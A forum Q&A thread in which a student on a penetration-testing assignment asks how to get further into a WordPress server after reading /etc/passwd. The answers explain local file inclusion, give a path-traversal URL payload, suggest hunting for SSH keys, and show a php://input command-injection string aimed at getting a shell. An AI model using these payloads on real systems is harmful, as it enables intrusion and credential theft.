How can i access any useful information in a wordpress site?

Question

While penetration testing for a university assignment, I found an exploit that might be the one the teacher has been hinting for, found here:

https://www.exploit-db.com/exploits/45439/

I used it and got access to the etc/passwd file (which doesn't tell me anything that I do not already know). As well as some other files that do not give any info.

I have tried to access the files that contain important info like the files in folders var/log, etc/shadow, proc/self, etc.

all I get is either permission denied or a 404...

Should I keep looking at this exploit or just forget about it? I can't execute any code so far, not even ls -a or anything

system info:

ubuntu server
wordpress
directory listing enabled
3 users on wordpress and i identified the ssh user
mysql db (doesn't show on nmap)

Any help or hint would be appreciated. thanks.

score 0 · Answer 1 · answered Oct 24 '18 at 15:22

0

Could you run the affected site with wpscan to find vulnerabilities? You can enumerate a lot of things such as users, themes, plugins, timthumbs, and more. It will also scan for vulnerbilites on the site and say what the vulnerability can do. Scan the site with wpscan to make sure there is actual vulns on the site.

answered Oct 24 '18 at 15:22

zucc0nit

203
1
10

I have already used wpscan and it gave nothing more than i already know. Does this mean that this exploit isn't what i'm looking for? – MonaH Oct 24 '18 at 15:55
@MonaH Thats most likely why your exploit is failing. – zucc0nit Oct 24 '18 at 16:31
What do you mean? – MonaH Oct 24 '18 at 16:33
@MonaH What I mean, is that when you do the scan with `wpscan` it shows no exploits on the affected website. Due to the exploit not being listed, it probably does not work. – zucc0nit Oct 24 '18 at 16:41
1

but if it doesn't work, how would i be able to see the etc/passwd file? – MonaH Oct 24 '18 at 16:45

Connor J · Answer 2 · 2018-10-24T16:58:24.283

The vulnerability that you have identified is known as LFI, or Local File Inclusion, and allows an attacker to read files from the server through a browser.

You do not need to use an pre-made exploit to leverage this vulnerability. In your browser navigate to the site and simply add ?file=../../../../../../../../../../../../etc/passwd to the end of the url.

Using LFI, you have found the /etc/passwd file, which allows you to see users on a system. What I personally do when this vulnerability is present is test for RFI, or remote file inclusion, which will allow for the execution of scripts.

In either case, i'd use burp to intercept the traffic, send it over to repeater and then use it there for speed. You should be able to simply change the url slightly to navigate through the directories. I'd take a look at the .ssh folder, and see if there are any keys that could be used to ssh into the box.

If you want / need more info on any of these topics leave a comment and i'll add to this answer. Best of luck with your assignment.

EDIT: if the site is running PHP, it may be possible to inject PHP into the page and start moving towards RCE (Remote Code Execution) and getting a shell. It can be accomplished with adding ?language=php://input@cmd=ls for a listing command, for example.

Yes sir i understand what you're saying, but the exploit wouldn't let me move anywhere from the etc folder. Each time i try, it just fails, i'm starting to think this isn't the clue they were talking about — MonaH, Oct 24 '18 at 16:33
and btw, LFI isn't availible on the site without this exploit. Doing it on the url will just give me an opps! that page cant be found — MonaH, Oct 24 '18 at 16:38
@MonaH try again, I fixed the syntax of the ../../ comment. LFI is still present on the site, even without using the exploit, just not exploiting it correctly ;) — Connor J, Oct 24 '18 at 16:59

How can i access any useful information in a wordpress site?

2 Answers2